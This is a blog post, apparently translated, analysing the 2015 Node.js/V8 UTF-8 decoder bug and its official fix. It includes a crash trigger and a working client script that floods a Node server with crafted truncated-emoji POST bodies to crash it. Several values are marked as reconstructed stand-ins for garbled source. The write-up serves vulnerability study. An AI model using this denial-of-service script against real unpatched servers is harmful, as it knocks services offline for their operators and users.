Background
Over the American Independence Day weekend, the Node.js community disclosed a serious security vulnerability:
https://medium.com/@iojs/important-security-upgrades-for-node-js-and-io-js-8ac14ece5852
First, here is a piece of code that triggers the vulnerability.
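The snippet below is a minimal sketch reconstructed from the walkthrough in the "Example analysis" section: a 4-byte smiley repeated 257 times and then truncated by 3 bytes (the exact original trigger code may differ slightly).

```js
// Reconstructed trigger sketch: 0xf0 0x9f 0x98 0x8a is the 4-byte UTF-8
// encoding of the smiley U+1F60A.
var smile = new Buffer([0xf0, 0x9f, 0x98, 0x8a]).toString();
// 257 smileys = 1028 bytes; slice(0, -3) drops the last 3 bytes, leaving 1025.
var buf = new Buffer(Array(258).join(smile)).slice(0, -3);
buf.toString(); // decoding the truncated buffer as UTF-8 can crash the process
```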
Running it directly on Node v0.12.4 crashes the process immediately.
Below we analyze in detail the principle of the vulnerability.
Call stack
The above code constructs a buffer 1025 bytes long and then calls the buffer's toString method to decode it as UTF-8, a perfectly ordinary call in everyday development. So why does it cause a crash, and how does it differ from the usual usage?
The sample code is small, but a lot of calls are involved, going from JS to Node's C++ layer and down into V8. The approximate flow is outlined below.
Critical calls
Several of the calls along this path are key to the vulnerability.
Utf8DecoderBase::Reset
Every instantiated Utf8DecoderBase object has a private member buffer_:

```cpp
private:
  uint16_t buffer_[kBufferSize];
```
Here kBufferSize is set to 512, and buffer_ serves as a staging buffer for the decoded UTF-8 characters. Note that 512 is not a byte count but a count of uint16_t units: some UTF-8 characters need only one such unit, others need two. The smiley character used to build the buffer in the sample code occupies 4 bytes and needs two units once decoded, so buffer_ can hold the decoded form of 512 / 2 = 256 smileys, i.e. the first 256 * 4 = 1024 bytes of input.
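As a quick sanity check (my own illustration, not from the original article), you can verify in Node that the smiley occupies 4 bytes in UTF-8 but only 2 uint16_t units (a surrogate pair) once decoded:

```js
// The 4-byte UTF-8 smiley decodes to a surrogate pair of two UTF-16 units.
var smile = new Buffer([0xf0, 0x9f, 0x98, 0x8a]).toString();
console.log(Buffer.byteLength(smile)); // 4 -- bytes in UTF-8
console.log(smile.length);             // 2 -- uint16_t units in UTF-16
```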
If the buffer to be decoded does not exceed 1024 bytes, it can be decoded entirely inside buffer_. The decoded characters are then copied into the memory of the string returned to Node via the call v8::internal::OS::MemCopy(data, buffer_, memcpy_length * sizeof(uint16_t)).
Utf8DecoderBase::WriteUtf16Slow
However, when the buffer to be decoded is longer than 1024 bytes, only the first 1024 bytes are decoded into the buffer_ staging area described above; the remaining undecoded bytes are handed to Utf8DecoderBase::WriteUtf16Slow for processing.
```cpp
void Utf8DecoderBase::WriteUtf16Slow(const uint8_t* stream,
                                     uint16_t* data,
                                     unsigned data_length) {
  while (data_length != 0) {
    unsigned cursor = 0;
    uint32_t character = Utf8::ValueOf(stream, Utf8::kMaxEncodedSize, &cursor);
    // There's a total lack of bounds checking for stream
    // as it was already done in Reset.
    stream += cursor;
    if (character > unibrow::Utf16::kMaxNonSurrogateCharCode) {
      *data++ = Utf16::LeadSurrogate(character);
      *data++ = Utf16::TrailSurrogate(character);
      DCHECK(data_length > 1);
      data_length -= 2;
    } else {
      *data++ = character;
      data_length -= 1;
    }
  }
}
```
WriteUtf16Slow decodes the remainder by calling Utf8::ValueOf in a loop, producing one UTF-8 character per iteration. Here data_length is the number of units still to be decoded (note: uint16_t units, not UTF-8 characters), and the loop runs until all data_length units have been written.
Utf8::ValueOf
As mentioned above, Utf8::ValueOf decodes one UTF-8 character from the remaining buffer. When the character is stored in multiple bytes, it calls down to Utf8::CalculateValue, which parses a UTF-8 character from the buffer according to the UTF-8 encoding rules. For the detailed rules, see Ruan Yifeng's blog article "Character encoding notes: ASCII, Unicode and UTF-8", which explains UTF-8 encoding very thoroughly.
```cpp
uchar Utf8::CalculateValue(const byte* str, unsigned length, unsigned* cursor)
```
The first parameter is the buffer to decode, the second is the number of bytes that may be read, and the last parameter, cursor, receives the offset consumed from the buffer, i.e. the number of bytes the decoded UTF-8 character occupies.
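For intuition (illustrative JavaScript of my own, not V8's code), decoding the smiley's 4-byte sequence by hand according to the UTF-8 rule 11110xxx 10xxxxxx 10xxxxxx 10xxxxxx yields the expected code point:

```js
// Manual decode of a 4-byte UTF-8 sequence following the encoding rules.
var bytes = [0xf0, 0x9f, 0x98, 0x8a];
var codePoint = ((bytes[0] & 0x07) << 18) | // lead byte 11110xxx contributes 3 bits
                ((bytes[1] & 0x3f) << 12) | // each continuation byte 10xxxxxx contributes 6 bits
                ((bytes[2] & 0x3f) << 6) |
                 (bytes[3] & 0x3f);
console.log(codePoint.toString(16)); // '1f60a' -> U+1F60A, the smiley
```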
Example analysis
Having briefly explained the call chain the sample code goes through, we now walk through the concrete calls it makes.
Buffer creation
First, the sample code uses the 4-byte smiley character to construct a buffer of length 257 * 4 = 1028 bytes, and then calls slice(0, -3) to drop the last 3 bytes, leaving 1025 bytes.
Buffer decoding
The buffer.toString() method is then called to decode the buffer as a UTF-8 string. Since 1025 bytes are to be decoded, the first 1024 bytes are decoded by Utf8DecoderBase::Reset into buffer_ as 512 units (256 smileys), and the one remaining byte, 0xf0, is passed to Utf8DecoderBase::WriteUtf16Slow to continue decoding.
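A quick check of this layout (again my own illustration, not from the original article):

```js
// Verifying the byte layout described above.
var smile = new Buffer([0xf0, 0x9f, 0x98, 0x8a]).toString();
var buf = new Buffer(Array(258).join(smile)).slice(0, -3); // 257 smileys, minus 3 bytes
console.log(buf.length);             // 1025
console.log(buf[1024].toString(16)); // 'f0' -- the lone byte left for WriteUtf16Slow
```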
```cpp
void Utf8DecoderBase::WriteUtf16Slow(const uint8_t* stream, uint16_t* data, unsigned data_length);
```
Here stream holds the remaining buffer to be decoded, data is the output area for the decoded characters, and data_length is the number of units still to decode. At this point the 512 units already decoded into buffer_ have been copied into data.
The last byte
The remaining byte of the buffer, 0xf0, is handed to Utf8DecoderBase::WriteUtf16Slow, which decodes it by calling Utf8::ValueOf. The binary form of this last byte, (0xf0).toString(2) === '11110000', marks it, according to the UTF-8 encoding rules, as the leading byte of a 4-byte UTF-8 character, so Utf8::CalculateValue is called and keeps reading the following bytes.
Since the original complete buffer was truncated by 3 bytes, the next byte read is expected to be 0x00, i.e. binary 00000000. That clearly does not match the continuation-byte pattern 10xxxxxx that UTF-8 requires, so the function returns kBadChar (0xFFFD). Decoding then finishes and the program does not crash.
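For reference (behaviour of a non-vulnerable decoder; my own example, not from the original article), a lone lead byte like this decodes to the replacement character U+FFFD, a single uint16_t unit:

```js
// A lone UTF-8 lead byte becomes U+FFFD (kBadChar), one UTF-16 unit.
var lone = new Buffer([0xf0]).toString();
console.log(lone === '\ufffd'); // true on a correct decoder
console.log(lone.length);       // 1
```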
The actual crash
That is the ideal case. In reality, because of the V8 engine's memory management strategy, decoding that last byte keeps reading past the end of the buffer and is very likely to pick up dirty data (from the logs I printed, the probability of hitting dirty data is very high). If those dirty bytes happen to combine with the last byte into a sequence that satisfies the UTF-8 encoding rules (also very likely), a valid UTF-8 character is decoded, occupying two units, whereas the ideal result would have been kBadChar, occupying one. So what exactly goes wrong then?
Let's go back to the Utf8DecoderBase::WriteUtf16Slow call.
```cpp
void Utf8DecoderBase::WriteUtf16Slow(const uint8_t* stream,
                                     uint16_t* data,
                                     unsigned data_length) {
  while (data_length != 0) {
    unsigned cursor = 0;
    uint32_t character = Utf8::ValueOf(stream, Utf8::kMaxEncodedSize, &cursor);
    // There's a total lack of bounds checking for stream
    // as it was already done in Reset.
    stream += cursor;
    if (character > unibrow::Utf16::kMaxNonSurrogateCharCode) {
      *data++ = Utf16::LeadSurrogate(character);
      *data++ = Utf16::TrailSurrogate(character);
      DCHECK(data_length > 1);
      data_length -= 2;
    } else {
      *data++ = character;
      data_length -= 1;
    }
  }
}
```
At this point data_length == 1. The call uint32_t character = Utf8::ValueOf(stream, Utf8::kMaxEncodedSize, &cursor) reads the dirty data that happens to satisfy the encoding rules, so the if condition is met and DCHECK(data_length > 1) is executed. With data_length equal to 1 the assertion fails and the process exits. (On my Mac the process did not exit on the assertion failure, presumably because the assertion is compiled out in release builds; execution continued with data_length -= 2, and since data_length is unsigned the result wraps around rather than becoming -1, so the while loop can never exit and the runaway writes eventually produce a bus error that crashes the process.)
For reference, the CHECK macro behind this kind of assertion is defined as:

```cpp
#define CHECK(condition)                                             \
  do {                                                               \
    if (!(condition)) {                                              \
      V8_Fatal(__FILE__, __LINE__, "CHECK(%s) failed", #condition);  \
    }                                                                \
  } while (0)
```
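To see why the loop can never exit once data_length underflows (plain JavaScript arithmetic standing in for the C++ unsigned subtraction; this is not V8 code):

```js
// data_length is a C++ `unsigned`; 1 - 2 does not yield -1 but wraps around.
var dataLength = 1;
console.log((dataLength - 2) >>> 0); // 4294967295 -- never 0, so the while loop keeps running
```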
Designing an attack scenario
Once the principle of the vulnerability is understood, designing an attack is much simpler: anything that performs this kind of buffer operation can be attacked. In web development the most common target is the server, so below we use the vulnerability to design an attack that crashes the server process and leaves the service unable to respond normally. Web applications routinely handle POST requests, and a Node server that receives POST data will inevitably use Buffer, so the approach is simply to keep POSTing maliciously constructed buffers to the Node server.
Server
Start a server that accepts POST data using the native http module:
```js
var http = require('http');

http.createServer(function (req, res) {
  if (req.method === 'POST') {
    var buf = [], len = 0;
    req.on('data', function (chunk) {
      buf.push(chunk);
      len += chunk.length;
    });
    req.on('end', function () {
      var str = Buffer.concat(buf, len).toString();
      res.end(str);
    });
  } else {
    res.end('node');
  }
}).listen(3000); // the port number is garbled in the source; 3000 is a stand-in
```
Client
Since reading dirty memory that also happens to satisfy the UTF-8 encoding rules only occurs with some probability, the client has to keep POSTing to the server. To make the server crash faster, we send a somewhat larger buffer.
```js
var net = require('net');
var CRLF = '\r\n';
var i = 0;

function send() {
  var connect = net.connect({
    'host': '127.0.0.1',
    'port': 3000 // must match the server port; garbled in the source, 3000 is a stand-in
  }, function () {
    // console.log('connected', new Date());
  });
  sendRequest(connect, '/post');
}

send();
setInterval(function () { send(); }, 50); // interval garbled in the source; 50 ms is a stand-in

function sendRequest(connect, path) {
  var smile = Buffer(4);
  smile[0] = 0xf0;
  smile[1] = 0x9f;
  smile[2] = 0x98;
  smile[3] = 0x8a;
  smile = smile.toString();
  var buf = Buffer(Array(16385).join(smile)).slice(0, -3);
  connect.write('POST ' + path + ' HTTP/1.1');
  connect.write(CRLF);
  connect.write('Host: 127.0.0.1');
  connect.write(CRLF);
  connect.write('Connection: keep-alive');
  connect.write(CRLF);
  connect.write('Content-Length: ' + buf.length);
  connect.write(CRLF);
  connect.write('Content-Type: application/json;charset=utf-8');
  connect.write(CRLF);
  connect.write(CRLF);
  connect.write(buf);
  console.log(i++);
}
```
After starting the server and then running the client script, you will find that the server crashes very quickly.
Bug fixes
Once the vulnerability principle is understood, the fix is very simple. The root cause is that Utf8::ValueOf can read dirty data that happens to match the encoding rules, because its second parameter is passed in as the constant 4 even when only one byte remains to be read. Node's official fix passes the actual number of remaining bytes to be decoded when calling this method, so that parsing the last byte no longer reads on into dirty data, and neither the assertion failure nor the infinite loop that crashes the process can occur.
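As a rough sanity check of a patched build (my own sketch, not from the official advisory), the truncated trailing byte should simply decode to U+FFFD instead of triggering out-of-bounds reads:

```js
// Expected behaviour on a fixed decoder; on a vulnerable build (e.g. v0.12.4)
// this same snippet can crash the process instead.
var smile = new Buffer([0xf0, 0x9f, 0x98, 0x8a]).toString();
var buf = new Buffer(Array(258).join(smile)).slice(0, -3);
var str = buf.toString();
console.log(str.charCodeAt(str.length - 1) === 0xfffd); // expected: true on a patched build
```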
Resources
- Important security upgrades for Node.js and io.js
- [Fix out-of-band write in utf8 decoder](https://github.com/joyent/node/commit/78b0e30954111cfaba0edbeee85450d8cbc6fdf6#diff-a3a7e2cde125f05dfde738eb27977f4fR181)
- Character encoding notes: ASCII, Unicode and UTF-8
- JavaScript's internal character encoding: UCS-2 or UTF-16?
Original link: https://github.com/hustxiaoc/node.js/issues/9 ("Talk about the Node.js Independence Day vulnerability")